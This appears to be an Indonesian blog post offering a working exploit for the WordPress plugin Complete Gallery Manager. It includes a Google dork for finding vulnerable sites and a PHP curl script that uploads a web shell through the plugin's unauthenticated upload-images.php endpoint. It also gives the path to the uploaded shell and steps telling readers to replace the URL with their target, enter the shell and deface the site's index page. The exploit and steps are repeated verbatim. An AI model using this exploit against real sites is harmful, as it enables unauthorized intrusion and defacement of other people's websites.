Google dork : "inurl:/wp-content/plugins/complete-gallery-manager/
exploit: /wp-content/plugins/complete-gallery-manager/frames/upload-images.php
Script php :
$uploadfile="asu.php";
$ch = curl_init("http:site/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Upload Access Path : http://site/wp-content/2013/09/asu.php
1. Ganti http://site dengan target lo
2. akses script php dengan XAMPP
3. Masuk shell
4. Tebas Index
exploit: /wp-content/plugins/complete-gallery-manager/frames/upload-images.php
Script php :
$uploadfile="asu.php";
$ch = curl_init("http:site/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Upload Access Path : http://site/wp-content/2013/09/asu.php
1. Ganti http://site dengan target lo
2. akses script php dengan XAMPP
3. Masuk shell
4. Tebas Index
Tidak ada komentar:
Posting Komentar